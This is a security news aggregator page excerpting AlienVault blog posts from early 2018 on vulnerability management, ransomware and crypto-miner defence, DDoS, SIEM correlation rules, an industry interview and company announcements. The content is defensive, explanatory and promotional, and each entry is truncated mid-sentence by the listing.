SEC News

What's new arround internet

Last one

Src	Date (GMT)	Titre	Description	Tags	Stories	Notes
	2018-03-14 13:00:00	Explain Vulnerability Management (lien direct)	All software and hardware has vulnerabilities. So do the non-computing aspects of your organizational security, such as the physical security of your building or how susceptible your employees are to social engineering. Vulnerabilities are everywhere and are in everything. The key to good security is to know how to manage your vulnerabilities. What are they? Where are they? How can they be patched? How can they be mitigated? Which risks are you willing to take? What is Vulnerability Management? Vulnerability management is a continuous process of testing, reporting, response, and triage. Bruce Schneier is famous for saying, “Security is a process, not a product.” That very much applies to vulnerability management specifically, as well. You don’t just design systems, configure them, and deploy them. Every day at work you should discover and think about your vulnerabilities and consider how you’ll deal with them. Two major aspects of your security work will change constantly, whether you like it or not. One is your network and computing infrastructure. New applications will be deployed and patched. New hardware will be introduced. New people will be hired. Policies will be changed. Sometimes regulations change as well. The second constantly changing aspect is the threat landscape. At least one point of your network will be connected to the public internet and new malware and cyber attack bots appear all the time. The way they cyber-. attack and the ways they evade detection will also evolve. New malware can also be introduced to your network through removable media and bring-your-own-devices. There are also social engineering and physical (often building related) attack vectors. All of those factors evolve and change and that’s the main reason why vulnerability management must be a continuous process. You will also learn something new everyday. If not, you’re doing something wrong. The Vulnerability Management Process The first phase of the vulnerability management process is asset discovery. You need to know what’s deployed on your network, which is increasingly difficult with BYOD and lines of business going off and “doing their own thing” outside of IT. You will learn about vulnerabilities in your network through sources like the CVE security management database, network vulnerability testing, vendor announcements, your logs and your SIEM, reports from your staff, and unfortunately sometimes in the wake of real cyber attacks. Do make sure you record your vulnerability discoveries in as much detail as possible, and preferably in a way that’s only accessible to the people who need to know about them. Reports should also be organized according to which aspects a vulnerability pertains to, such as an application your network uses, or a physical building vulnerability. Because vulnerabilities pertain to all the aspects and facets of your network, you should have lots of different categories. Regulations and compliance standards, as well as company policy, must also be considered. Depending on your company, industry, and jurisdiction, there may be specific standards that your vulnerability management reporting must conform to. Over time, you will inevitably discover and report a lot of vulnerabilities. A good prioritization process will help you triage your vulnerabilities so you can respond to th
	2018-03-13 13:00:00	Infosec Language Grows Up: The Bishop Fox Cybersecurity Style Guide (lien direct)	On February 15, Bishop Fox released their Cybersecurity Style Guide. I am absolutely stoked for them, and for the arrival of what looks like a new era in InfoSec language consistency. I was lucky enough to get to speak to Technical Editor Brianne Hughes last week. “I polled the internal team,” she told me, “and got the https://willusingtheprefixcybermakemelooklikeanidiot.com/ sent back to me a few times. We need to be consistent as a department – Engineers want to know why, they want transparency, and they don’t want to be told what to do. We have lively dialog in the comments of our reports.” She went on to say, “InfoSec merges hacker slang and military jargon in a corporate setting, and it’s hard to find middle ground. The language itself is a kind of slang, and the point of slang is to identify in-groups and out-groups, so there’s a definitely border built up that were looking to poke holes in to facilitate future conversations.” Largely, those of us lucky enough to work for InfoSec companies enlightened enough to know that having editorial services available is a good thing, have mostly done our thing solo, and we’ve collected language that’s specific for our company. As a new editor in that position, there’s always that little moment of hesitation, where you try to decide what style guide to leverage. Microsoft, with its monolithic 1990’s tablet-down-from-the-mount style guide? Sun Microsystems, where once upon a time the collective Editorial staff met to decide the proper way to write “readme,” only to decide after four straight hours of heated argument that since the users knew what we meant, we would willfully refuse to standardize? There’s the Yahoo Style Guide, the Salesforce Style Guide… everyone’s got one, and most editors have a favorite. But this is the first time I’m aware of that someone specifically in the world of InfoSec has taken a stab at creating something like unification, by not only creating a guide, but actively promoting it, and soliciting input from across the industry. “I made this for myself because I needed it,” says Brianne. “And I was lucky enough to have the skills and the support. It’s a beautiful environment where Bishop Fox has been around 12 years, but allows for passion projects.” The second it downloaded, I sat down and read every word. You guys… this is superlative. Some highlights include: A technical formatting section simple enough to cover our needs, without going over the top to cover every possible contingency. An appendix explaining how decisions were made. This is particularly glorious, because mostly, we’re winging it. The Wild West style of InfoSec netymology has meant that most of us within our silos make a choice, and call it done. There’s been very little in the way of guidance about how to make those decisions. I think that if we, as editorial professionals, can help each other make consistent choices, the entire field will mature more rapidly, and that is all to the good for improving consistency and transparency of dialog between professionals and their clients. Another appendix for external resources. This is so beautifully thought-out, so comprehensive… I felt myself sighing in pure appreciation. I personally ha		Yahoo
	2018-03-12 13:00:00	Countering Crypto-Malware: A Guide to Preventing a Ransomware Infection (lien direct)	Ransomware had what Malwarebytes describes as a "banner year" in 2017. In the 2017 State of Malware report, telemetry gathered by the anti-malware provider reveals that business and consumer ransomware detections swelled by 90 percent and 93 percent, respectively. The monthly rate of ransomware attacks against businesses grew by approximately 10 times the rate of 2016 over the same period in 2017. A 700 percent increase in ransomware helped drive that surge, with GlobeImposter and WannaCry leading the way. Malwarebytes 2017 State of Malware report page 6 Overall, Malwarebytes saw new ransomware development stagnate in the second half of 2017 as digital criminals shifted their focus to bring back old threats like banking Trojans and embrace new techniques, most notably malicious cryptocurrency miners. Those trends notwithstanding, ransomware isn't going away anytime soon. Users should therefore follow these five simple steps that can help them stay safe from a ransomware attack. Install an Anti-Malware Solution While some digital attackers are turning to fileless malware, many ransomware strains still come with a digital signature. Anti-malware solutions can use these imprints to detect and block a crypto-malware threat before it has time to execute on a computer. Victims of ransomware can also use these tools to clean their computers of ransomware before they restore their data using a free decryption tool or available backup. Update Your Systems Regularly A common delivery vector for ransomware is an exploit kit. It's a type of software package that scans for known vulnerabilities in Adobe Flash Player and other programs. If it finds a match with its hardcoded exploits, the kit launches code that exploits the vulnerability and in turn downloads ransomware onto the vulnerable machine. By staying current with software patches, however, users can block exploit kits from activating on their computers. How Exploit Kits Work. (Source: Barkly) Avoid Suspicious Links and Email Attachments As seen in the graphic above, one of the most common beginnings of an exploit kit campaign involves a phishing email recipient clicking on a malicious link that redirects them to a compromised website. Users aren't powerless against these tactics. They can make a point of not clicking suspicious links and email attachments, including those that come with messages sent to them from unfamiliar senders. Disable Macros for Office Documents Microsoft Office documents come with what's called macros. They are essentially rules that users can craft in order to save time by automating repetitive tasks. Unfortunately, digital attackers often hide ransomware executables within Office macros and attempt to capitalize on users' curiosity by tempting them with an unknown attachment. Users can protect themselves against this trick by disabling macros in Office, by steering clear of unsolicited attachments, and by making it a rule to not enable macros in any document should they receive a prompt to do so. Install a Pop-Up Blocker Bad actors don't just rely on ema	Guideline	Wannacry
	2018-03-09 14:00:00	Things I hearted this week 9th March 2018 (lien direct)	It’s been an uneventful week for the most part. I did spend a lot of time reading tweets by Today In Infosec. If you don’t know of it, I suggest checking it out. As the name suggests, it tweets out news from the world of information security from previous years. I was thinking that maybe I could wait five years and then recycle these weekly roundup blogs as “This week in Infosec” But that’s the future, let’s jump into the news that matters today. An Olympic hack What went on behind the scenes at the Olympics? How much hacking went on, who was behind it, and what can be done about it? Lessons in Cyber: Influence Operations \| Comae technologies (the Grugq) 2018 Winter Olympic Games have been hacked, organizers confirm \| Digital trends Russian spies hacked the Olympics and tried to make it look like North Korea did it, U.S. officials say \| Washington Post SAML, SSO many vulnerabilities SAML-based single sign on systems have some vulnerabilities that allow attackers with authenticated access to trick SAML systems into authenticating as different users without knowledge of the victims’ password. Sounds like a lot of fun. Duo Finds SAML Vulnerabilities Affecting Multiple Implementations \| DUO Passhunt I came across this little gem on GitHub this week. Basically, it’s a repository of default credentials for a plethora of network devices, web apps, and so forth for over 500 vendors and near 2100 default passwords. Remember, Mirai originally only had 61 default passwords to wreak havoc. Passhunt \| GitHub Sharing is caring If you give your information to a business, how many places do you think it shares that information with? None, a dozen, fifty? Well, thanks to GDPR compliance, PayPal has shared a list of over 600 entities it shares data with. List of Third Parties (other than PayPal Customers) with Whom Personal Information May be Shared \| PayPal Related What Amazon Echo and Google Home do with your voice data \| Wired MoviePass CEO admits company creepily tracks users \| New York Post
	2018-03-08 14:00:00	Explain What DDoS Is (lien direct)	Your favorite website goes offline. That firewall in your office network isn’t filtering anything and is overwhelming the server machines that it is connected to. If an LDAP port is hit by a DDoS attack, you have no Active Directory securing the user accounts on your Windows client PCs. Maybe an IMAP server was hit, so now you have to actually phone your boss because she cannot communicate with you via email. You sit in your cubicle, unable to log into your PC because LDAP was DDoS attacked. Accessing your work email on your phone is a waste of time because your employer’s email server won’t work if it’s the DDoS target instead. And to all of that, the web forums on fly fishing you usually kill time with are offline because they were hit by a DDoS attack as well! The network administrator steps out of the datacenter and announces to your office that the company’s firewalls and servers were hit by a DDoS attack. But there’s no need to worry, because she will bring everything back online within the next ten minutes. What happened? A DDoS attack, Explained DDoS is an acronym for Distributed Denial of Service. A simple Denial of Service could be a technical accident where something such as a memory buffer overflows and the affected device is forced to shut down because of it; however, DDoS attacks are no accident. They are deliberate, malicious cyber-attacks. The targeted network appliance or server denies usual service because it has been deliberately overwhelmed with data packets. Imagine five hundred people trying to run through a doorway at the same time. The service that the doorway usually provides by allowing people to go from one room to another will obviously no longer work. The doorway has a finite capacity, same as a firewall and memory buffer in your server application. DDoS attacks are conducted deliberately by cyber attackers. The most common way that DDoS attacks are conducted these days is by leveraging control of a botnet. A botnet is a network of “bots,” usually through the internet. The bots are usually PCs, mobile devices, and IoT devices which have malware on them that allows a cyber attacker to use their computing power through their command and control server. When the attacker finds a public IP address that they want to target, they will command their bots to send as many data packets to the IP as possible. All of those packets all at once will overwhelm whichever device and software the IP is connected to, and it will go out of service. Occasionally these days but more frequently in the 1990s, a web server’s website could go offline if too many people try to download webpages from it at the same time. Big tech companies like Google and Amazon have massive datacenters around the world which consume more electricity than some countries. They can handle millions of people trying to use their web services at the same time. But if I install Apache on an old PC on my LAN and put a website on it, it won’t have anywhere near the same capacity. Hundreds of people trying to download a webpage at the same time might overwhelm my home router and my modest PC, and it will go offline. That’s the sort of denial of service that’s an innocent accident. But DDoS attacks are no accidents. They’re also distributed, which means that many different devices are working in unison to flood an IP with packets. Explain Types of DDoS attacks The OSI layer model describes seven layers which constitute a networked computing entity, usually through TCP/IP.
	2018-03-07 14:00:00	An Interview with Graham Cluley (lien direct)	I can’t remember what year I first met Graham Cluley. It may have been around 2006 at an awards event of some sort. We were both nominated in the same category; I believe it was for best security blogger. Graham was already well-established with many awards under his belt, whereas I was the jittery newbie, glad to have even been nominated for anything at all. As you may have guessed, Graham won that night. Usually I’d force a smile, congratulate the winner with some hollow words and then drown my disappointment at the buffet. But Graham is quite the quintessential gentleman. He sat and chatted with me throughout the evening, sharing tips and techniques and being overall very encouraging. I’ve kept an eye on his career ever since and stayed in touch with him. I felt like it was worth getting some time once again and talking through what makes him tick. You’ve been in the industry for a long time, what’s the secret to staying so apparently happy and enthusiastic - not to mention retaining a full head of hair? Life is so ghastly and absurd that it's impossible to take it too seriously. One of my failings is that I have a pitifully low boredom threshold, and find it a hard thing to disguise. This isn't a good thing, and has probably harmed my career immensely. Recently my wife says she's spotted a couple of grey hairs on my head, so it does appear that I am mortal My brothers don't seem to have lost their hair either, so it must be something in the Cluley gene pool. That or the fact I spent the first eighteen years of my life eating only cheese sandwiches. There were your early days at Dr. Solomon’s, the Naked Security era, and now your life as an independent expert - with a more respected brand than most companies have. Was this a planned journey? How did your career end up here? I don't really think I have a career. I find it hard to describe to people what exactly it is that I do for a job. When I meet up with my brothers, they're baffled as to how I'm able to make a living too. So, there was no planned journey to get to this point. At college, I wrote and sold computer games, and they're what got the attention of Alan Solomon who offered me a job as a programmer in the early days of anti-virus. I left Dr. Solomon's (which was a fun place to work) because they got acquired by McAfee (who didn't seem very fun). I joined Sophos because it was a small fun company, and then left when it became big and stopped being fun. I make decisions like these fairly impulsively. Something will switch in my head and make me say, "I'd rather do something fun", and then that's it, my mind’s made up. Life is a little different now as I have a wife and young son, and I need to remind myself that I have some responsibilities. If they weren't in my life, it's quite possible that I would be doing something other than computer security. But I do enjoy finding new things to do – and my latest obsession is the weekly podcast I co-host with Carole Theriault. You’re a pretty public figure, but what little-known fact about your background usually surprises people? While I was studying at university, my girlfriend joined a cult. I tried for years to get her out, without success. That was pretty horrible, but I met a lot of good people and - hopefully - helped some other people l	General Information	Uber
	2018-03-06 14:00:00	AlienVault USM Anywhere ISMS is Now Certified to ISO 27001:2013 (lien direct)	I’m pleased to announce that AlienVault’s USM Anywhere Information Security Management System (ISMS) is certified to ISO 27001:2013 by an accredited certification body. This certification underscores our commitment to providing effective threat detection and rapid incident response capabilities in a secure cloud environment. Our certification process was led by Coalfire ISO, Inc., an ISO/IEC 27001 Certification Body accredited by the ANSI-ASQ National Accreditation Board (ANAB). The scope of this certification includes the following: the development and implementation of a rigorous security program, which includes the development and implementation of an ISMS for the AlienVault Unified Security Management® (USM) product offering, which includes USM Anywhere™ and USM Central™. About ISO/IEC 27001:2013 The ISO/IEC 27001 family of standards define a global standard for information security management. These standards outline the best practices and security controls required for a strong information security program, one that protects sensitive company information. The standards are comprehensive, spanning the people, processes, and IT systems involved in an organization’s security program. The sensitive information covered in ISO 27001 includes any data entrusted by third parties. For a SaaS security provider like AlienVault, this means that, in order for USM Anywhere to be compliant with ISO 27001:2013, we had to demonstrate how we secure, transmit, and store data on behalf of our customers. Having this certification gives our customers extra assurance that we are securely handling their sensitive security-related data. Like our compliance certifications for PCI DSS, SOC 2 Type 2, and an attestation of HIPAA compliance, our successful completion of a third-party audit and compliance certification for ISO 27001:2013 tells our customers that we are doing exactly what we say we are doing—that we maintain robust security controls to continually support and protect your data as well as our own. We’ve Been Drinking Our Own Champagne Again Last year, when AlienVault achieved compliance certifications and attestations for PCI DSS, SOC 2, and HIPAA, I described how we used the AlienVault USM Anywhere service in house to demonstrate our compliance. We did the same for our ISO 27001:2013 certification. While it’s not mandated that a security solution provider use its own product for its internal security and compliance programs, I do think it is important that you “drink your own champagne,” (or, as I noted in the previous blog, “eat your own dog food.”) With the USM Anywhere service offering, our compliance officer was able to readily walk auditors through many of the key security controls outlined in ISO 27001:2013. Because the platform has many out-of-the-box compliance features, including pre-built reports and custom data views, it makes it simple and fast to navigate an audit process. For customers on their own compliance path for ISO 27001:2013 certification, AlienVault USM can help to cut through the complexity and uncertainty of the audit. How ISO 27001:2013 Sets the Stage for the GDPR At AlienVault, we haven’t been shy about the fast-approaching deadline (May 25, 2018) for the EU General Data Protection Regulation (GDPR).
	2018-03-02 14:00:00	Things I Hearted this Week 2nd March 2018 (lien direct)	This week London has been in the midst of snowmageddon! An inch of snow ground the city to a halt with schools closed and the capital on red alert. Fortunately, one of the perks of working from home is that I get to stay on top of the security news regardless of the weather, so put on your snow boots and jump right in. Trading stocks in the wake of breaches The US securities and Exchange Commission (SEC) has waned high-ranking executives not to trade stocks before disclosing beaches, major vulnerabilities and other cybersecurity related incidents. SEC statement on public company cybersecurity disclosure (PDF) \| SEC After Intel & Equifax Incidents, SEC Warns Execs Not to Trade Stock While Investigating Security Incidents \| Bleeping Computer Tracking your sold hardware Many devices now come with tracking features to help you find it if it gets lost or stolen. It started predominantly with phones, but now is in most laptops, desktops, and plenty of smart devices. The trouble is that location tracking isn’t something we intuitively ask for when buying or selling an item. We just assume that the seller has disabled it, or it wasn’t enabled in the first place. Will we get to a point where before buying a smart teddy, a kid will ask if its been factory-wiped and all credentials removed? How I sold an old Mac and unknowingly had access to its location for over 3 years \| Bredon Mulligan / Medium Cover your own assets John Carroll wrote an interesting blog post on influencing business layers that might not get infosec. Cover your own ass(ets) \| CTU Security Cybersecurity Style Guide How many times have you wished you had a cybersecurity style guide to help you understand how to pronounce security phrases, or write a word, or the definitive meaning of a term. Well, your wishes have all been answered as Bishop Fox has created a style guide for you. Web Semantics: The Bishop Fox Cybersecurity Style Guide \| Wired Download the Bishop Fox Cybersecurity Style Guide (PDF) \| Bishop Fox Revenge Hacking Well, at least the motive was easy to establish. Man admits hacking former employer’s computer system for revenge \| Hackread Teach a man to Phis		Equifax
	2018-03-01 14:00:00	What We Lack Most in InfoSec: Inherited Credibility (lien direct)	Ask any InfoSec person the following question: What do you lack most in your job? Can you predict the answers? Of course you can. Most InfoSec folks will answer that they lack money, and resources (also known as “people”). Some of the more creative types will also mention that they lack time. These are all good answers, but they don’t answer the question. These answers indicate what most InfoSec people need, rather than what they lack. What we lack in the InfoSec community is exactly what will allow us to fulfill those needs. I was listening to a recent Lawfare podcast. This episode featured a speech given by Chuck Rosenberg to law students at University of Virginia law school. If you are unfamiliar with Chuck Rosenberg, he served as Chief Of Staff at the FBI under James Comey, as well as counselor to FBI Director Robert Mueller. Mr. Rosenberg has an impressive history. His speech was about leadership, but he mentioned something that made me consider the question “what do we lack most in InfoSec?” Take the following scenario as an example. An attorney for the Eastern District of the United States stands before a court, ready to present a case. Once the court is called to order, the attorney introduces himself. He will customarily stand, and say: “Chuck Rosenberg, on behalf of the United States of America.” Those words have implied power. Not because it is Chuck Rosenberg saying them. There is much more to it; those words carry inherited credibility. Their power is derived from a storied institution of power. Inherited credibility is what we lack most in InfoSec. You can be the world’s most elite hacker, capable of popping a shell faster than anyone else in town, but you will only get odd stares if you walk into the CEO’s office boasting of that credential. Most corporate cyber positions, from the security analyst, all the way up to the CISO, simply do not carry any inherited credibility. This is mostly due to the newness of cybersecurity positions in most organizations. We may still be quite a distance from creating an inheritable empire. According to a February 2018 report by the Council of Economic Advisers, there is still no common lexicon for categorizing malicious cyber activities. This is especially true when discussing cybersecurity events. If we have yet to develop a common language, we are still too far off from closing the credibility gap. We may currently lack inherited credibility, but this puts us in a unique position, as we are the trailblazers who can build that inheritance for our successors. If, however, you are working in InfoSec for your own self-aggrandizement, then you are sadly on a path to failure, but that is a broader subject. Inherited credibility is what will move us from need to surplus. (Perhaps “surplus” is a bit too optimistic, but you get the point.) The more important question you can ask yourself every day is: How can I build the credibility that will give my successors the power to continue to grow this meaningful work?	Guideline
	2018-02-27 14:00:00	Announcing the Winners of our Partner of the Year Awards (lien direct)	The results are in, and we’re thrilled to recognize seven outstanding AlienVault partners. These companies achieved phenomenal business growth during 2017 and are the winners of our Partner of the Year awards! The AlienVault Partner Program enables leading VARs, system integrators, managed security service providers (MSSPs), managed detection & response providers (MDRs) and corporate resellers to sell and support AlienVault solutions and deliver compelling services powered by AlienVault USM in the global marketplace. With a strong focus on partner enablement, the program is designed to help partners create new opportunities for business growth, expansion and profitability. AlienVault’s dynamic and rapidly expanding partner community is a critical part of our success as a company, and we are committed to enabling and supporting the growth of our partners based on their individual goals and objectives. Our Partner of the Year awards recognize the success achieved by our partners in the following categories: GLOBAL AWARDS: Global Partner of the Year: SHI INTERNATIONAL INC. Highest overall sales bookings in 2017 SHI led the AlienVault global partner community in closed deals, new customers and of course, bookings, which grew by more than 100% year-over-year. Their commitment to AlienVault is demonstrated by the large number of unique sales professionals at SHI who are responsible for identifying and booking deals with us. Growth Partner of the Year: ABACODE Highest growth in 2017 as compared to 2016 sales bookings Abacode established their service offering based on AlienVault in late 2015. They did well in 2016, but 2017 was a breakout year, with the team delivering strong bookings and more than 300% growth – the largest year-over-year % increase of all our global partners. New Partner of the Year: BLUEVOYANT Highest sales bookings by a partner that joined our program in 2017 BlueVoyant began working with us in a limited capacity in early 2017. However, after only a few short months, they went “all in,” committing to the AlienVault USM platform to deliver services to their global customer community. REGIONAL AWARDS: These awards recognize partners that had the highest sales bookings in each of the 4 regions. North American Partner of the Year: TERRA VERDE SYSTEMS A long-standing AlienVault partner, Terra Verde has built a robust, diversified practice – reselling AlienVault USM, delivering world-class services and implementation, and leading some of the highest-rated AlienVault training classes within our partner ecosystem. Latin American Partner of the Year:	Guideline
	2018-02-26 14:00:00	SIEM Content Engineer - Why Is It a “Thing”? (lien direct)	If you Google “SIEM Content Engineer,” “SIEM Threat Content Engineer,” or “SIEM Content Developer,” you will see a bunch of ads, job listings and very little other content. I believe this is because the concept is new, and it appears SIEM Content Engineer is emerging as a new job title that HR departments in large companies have latched onto for a role/job that, in reality, has been around for years. For at least a decade, Anton Chuvakin of Gartner has been discussing SIEM roles and responsibilities. This new term is likely to set off even more discussion. SIEM Content Engineer Role & Responsibilities The SIEM Content Engineer role seems to be defined with quite a range of responsibilities, according to the job listings I reviewed. Here are some samples plucked from researching the term and checking out jobs: Analyzing, designing, developing and delivering solutions to stop adversaries Identifying threats Incident response Risk reviews Vulnerability management Event monitoring, including log management and SIEM Defining how logs should be parsed Writing new correlation rules Coordinating and conducting event collection, log management, event management, compliance automation, and identity monitoring activities Writing custom active lists, queries, and rules Care and content of SIEM platforms Developing custom content based on threat intelligence Ensure SIEM technologies are integrated & utilized to protect cyber related assets The qualifications that were required varied quite a bit, most desiring a technical college degree and hands-on experience with SIEM. Some were quite specific, including things like knowledge of basic networking protocols and addressing schemes, e.g., TCP/IP functions, CIDR blocks, subnets, addressing, communications, etc. Do All SIEMs Require SIEM Content Engineers? SIEM is one of the core capabilities of AlienVault’s Unified Security Management (USM) platform. And yet, despite having worked at AlienVault for four years now, this title “SIEM Content Engineer” was totally foreign to me. I was curious about this new buzzworthy job title, so I asked my colleagues if they were familiar with it. One of my colleagues in Product Marketing who had worked for/with other SIEM vendors in the past was aware of the job title. He explained to me that even now, legacy SIEM products aren’t ready “out of the box” – they are far from a quick implementation. In order to function well, those SIEMs often require a dedicated team, or at least one person, to solely focus on writing custom correlation rules and queries. It seems as though those big, custom data analytics solutions still require quite a bit of human intelligence and effort to work properly. For example, it can be tricky for IT security practitioners to integrate emerging threat intelligence with the SIEM correlation engine so a SIEM Content Engineer may be required. I’m going to have to brag about AlienVault a bit, as the AlienVault Labs Security Research Team handles 100 percent of that task for USM users. In addition to other research methods and sources, this team analyzes and validates the shared threat data in the
	2018-02-23 14:00:00	Things I Hearted this Week 23rd Feb 2018 (lien direct)	This week seems to have flown past very quickly. We’re almost at the end of February but the security goodness (and badness depending on which side of the fence you sit) keeps rolling in at breakneck speed. I’m actually contemplating moving somewhere warm for the rest of winter. Not that it gets unbearably cold in London, but the winter does seem to drag on with grey skies and rain, and a never-ending cycle of colds, sniffles, not to mention the life-threatening “Man Flu!” But enough about me, let’s jump into the security goodness! Threat modeling Threat models are great, and poorly understood, or used by security professionals as a universal ‘get out of jail card’. “Why don’t you have 2FA on your web app?” “Oh, that’s not in our threat model.” “Why don’t you sandbox this?” “Oh, that’s not in our threat model” “Why don’t you have your threat model documented?” “Oh, that’s not in our threat model” It’s like the security equivalent to the business saying they “accepted the risk”. An interesting piece in CSO magazine takes a look at common threat model mistakes. 7 threat modeling mistakes you’re probably making \| CSO What is threat modeling? \| Motherboard Two Billion! Two billion (with a B), that’s the number of files apparently leaked in the US during 2017. The most common type of breach after hacking was unintended disclosure such as cloud storage misconfigurations. That means that millions of records could have been kept secure had someone brushed up on their AWS S3 Bucket security skills and not ticked the box to make it public. We’ve found the APT, the APT is us! Two Billion Files Leaked in US Data Breaches in 2017 \| Infosecurity Magazine The US witnesses significant number of healthcare breaches in 2017 \| Healthcare Global A SWIFT $6m Unknown hackers stole 339.5 million roubles ($6 million) from a Russian bank last year in an attack using the SWIFT international payments messaging system. Well, that’s a surprise. It’s not like SWIFT has been targeted ever for malicious purposes… Hackers stole $6 million from Russian bank via SWIFT system: central bank \| Reuters India's City Union Bank CEO says suffered cyber hack via SWIFT system \| Reuters		Tesla
	2018-02-22 14:00:00	Threat Detection & Response Made Easier for Growing Financial Services Company (lien direct)	For a San-Francisco based financial services firm that partners with technology entrepreneurs in the US and China, maintaining a strong security posture is critical to the company’s success. The firm’s portfolio of 200 companies are security conscious and expect the firm to stay ahead of security threats. But this can be difficult, especially for a small team with time constraints. The firm’s Vice President of Global IT recently spoke with me about challenges his team faces. “We’re a team of three people who wear multiple hats and have about two hours each week to focus on security. It takes a lot of time to handle more than 1,000 spoofing attacks per month and respond to major vulnerabilities such as Meltdown. In addition, we have to monitor on-premises equipment at three offices as well as our cloud-based architecture, while also staying on top of employees using risky plugins and toolbars or installing sketchy software on their laptops.” To better detect a range of potential security threats, the Vice President of Global IT tested out a variety of disparate tools but found it difficult for his team to manage these. In looking for a comprehensive security monitoring solution, he considered different products including Splunk, but found these to be lacking in functionality and costly to deploy. As part of his requirements, he wanted a cloud-based offering that didn’t have data storage limits and could be integrated with disparate systems. Ultimately, he chose AlienVault USM AnywhereTM, our cloud-based security monitoring platform, as the best fit for his team’s needs. In addition to the platform’s unified capabilities, the IT team leader had heard that it was easy-to-use and affordable; since deployment, he has been impressed with its capabilities. “AlienVault has built out a unique product that is ideal for small companies like ours,” he explained. “No others are as comprehensive for organizations with small IT teams.” The company has been using USM Anywhere to manage threat detection since January of 2017. Designed with the needs of today’s resource-constrained IT security teams in mind, USM Anywhere significantly reduces the time and budget required for effective security monitoring and compliance management. Managed through a single plane of glass, the SaaS security monitoring platform allows the company to centralize and simplify threat detection, incident response, and compliance management across their full IT infrastructure. The platform also integrates with other IT systems and business applications such as Microsoft Office 365, Okta, and Cisco Umbrella to provide a more complete view of the company’s security posture. Another key benefit for the company is USM Anywhere’s ability to correlate server and firewall logs with data traffic between the company’s office and in the cloud to identify behavioral patterns consistent with malicious activity. These event patterns are automatically prioritized and trigger an alarm to expedite investigation and response. Such proactive alerts from USM Anywhere have helped the company to keep up with threats as they develop so they can take action and block IP addresses as needed. Additionally, AlienVault’s Open Threat Exchange® (OTXTM) provides threat intelligence updates related to financial services and China – two of the company’s main concerns. Using these alerts, the company proactively manages threat detection to prevent attacks from spreading	Guideline
	2018-02-21 14:00:00	Crypto-Miners: What Are They and What Steps You Can Take to Protect Yourself (lien direct)	Bitcoin's value grew significantly in 2017. At the beginning of the year, a single Bitcoin was worth less than $1000. By year's end, its price had grown to over $13,000. That's after peaking at $19,086.84 on 19 December. Such growth didn't go unnoticed by digital attackers or by organizations looking to supplement their online advertising revenue. Both responded by deploying crypto-miners. These tools help generate money for domain owners, yet they oftentimes have negative consequences for unsuspecting users exposed to them. To better understand the growing threat of crypto-miners, let's take a look at how crypto-mining works in general, how bad actors are abusing them to take advantage of ordinary people, and how users can protect themselves. What Are Crypto-Miners? Crypto-miners are tools that "mine," or generate, new units of a cryptocurrency like Bitcoin. They do so by completing mathematical puzzles that constitute what Hacker Noon's Chris Herd calls "proof of work calculations" for the new units. The process of mining doesn't just generate cryptocurrency; it also adds, secures, and verifies transactions to the blockchain. A deeper dive into how cryptocurrencies work is necessary to better understand crypto-miners. Digital currency like Bitcoin runs on the blockchain, a ledger of transactions which is distributed across the entire community of users who own units of that cryptocurrency. Benzinga staff writer Shanthi Rexaline explains it's here where mining comes into play: Every single transaction made and the ownership of every single cryptocurrency in circulation is recorded in the blockchain. The blockchain is run by miners, who use powerful computers that tally the transactions. Their function is to update each time a transaction is made and also ensure the authenticity of information, thereby ascertaining that each transaction is secure and is processed properly and safely. Every 10 minutes, mining computers collect a "block," or a few hundred pending Bitcoin transactions, and turn them into a mathematical puzzle. Those computers then use special equipment to compete against one another to solve that puzzle. Whoever completes the challenge first is eligible to receive a reward of 12.50+0.943 BTC, which is worth approximately $113,834.49 USD as of 7 February 2018. The Economist explains that the first miner to find the solution to the mathematical puzzle can announce it to the Bitcoin community. At that point, the other miners verify if the solution is correct. Assuming it is, the block is cryptographically added to the ledger, with the miners moving on to the next grouping of transactions, thereby adding to the blockchain. Source: Bitcoin 2.0 (SlideShare) How Malware Authors Are Abusing Crypto-Mining Crypto-mining isn't itself malicious in nature. But bad actors are abusing it for nefarious purposes. They're doing so by illegally accessing important business assets such as servers used for electronic medical record (EMR) systems or
	2018-02-20 14:00:00	How SIEM Correlation Rules Work (lien direct)	SIEM is a powerful security tool when deployed properly. Network security appliances like IDS devices, IPS devices, and firewalls generate an awful lot of logs. A well-configured SIEM will alert security administrators to which events and trends they should pay attention to. Otherwise they’ll be too lost in event log noise to be able to effectively handle possible security threats to their network. One of the key components that a functioning SIEM requires is good and sensible SIEM correlation rules. Let’s learn how SIEM correlation rules work! It’s actually pretty simple and easy to understand. What is a correlation rule? The various appliances in your network should be constantly generating event logs that are fed into your SIEM system. A SIEM correlation rule tells your SIEM system which sequences of events could be indicative of anomalies which may suggest security weaknesses or cyber attack. When “x” and “y” or “x” and “y” plus “z” happens, your administrators should be notified. Here are some examples of SIEM correlation rules which illustrate this concept. Detect new DHCP servers in your network by watching for inside or outside connections which use UDP packets (“x”), have port 67 as the destination (“y”), and the destination IP address isn’t on the registered IP list (“z”). Warn administrators if five failed login attempts are tried with different usernames from the same IP to the same machine within fifteen minutes (“x”), if that event is followed by a successful login occuring from that same IP address to any machine inside the network (“y”). The first example could indicate a cyber attacker establishing a DHCP server to acquire malicious access to your network. Any authorized DHCP server would use one of your registered IP addresses! The second example could indicate a cyber attacker brute-forcing an authentication vector and then successfully acquiring authentication to your network. It could be a possible privilege escalation attack. Both SIEM correlation rules could be triggered by honest mistakes and simple user errors or technical glitches. But they’re also key indicators of cyber attack and security administrators should check them out right away! SIEM correlation in a nutshell Your SIEM will analyze a whole lot of event logs which record endless seemingly mundane activities. They will look mundane to a human being if they just keep reading a list of thousands of events. Connection established from some IP address and some TCP/IP port to another IP address and TCP/IP port! Some user changed their username on Tuesday and their password on Thursday! Some client machine downloaded 500MB and uploaded 200MB of network traffic one day, then downloaded 3.5GB and uploaded 750MB of network traffic the next day! Properly designed SIEM correlation rules cut through all of the blah, blah, blah of your network event logs to detect which sequences of events are likely indications of cyber attack. So you should take great care in developing your SIEM correlation rules. SIEM is driven by computers and computers will just execute any instructions you give them. You as the clever human being with an organic brain should come up with practical SIEM correlation rules so your SIEM system can wake you up when there’s a possible cyber attack you should pay attention to. What is normalization in SIEM? Various different software, hardware, and networking component vendors use their own event log formats. An event log will have different information fields. A SIEM system will do its best to read the various event log formats in order to make sense of them. If you make Excel spreadsheets, imagine all of the different ways someone could d	Guideline
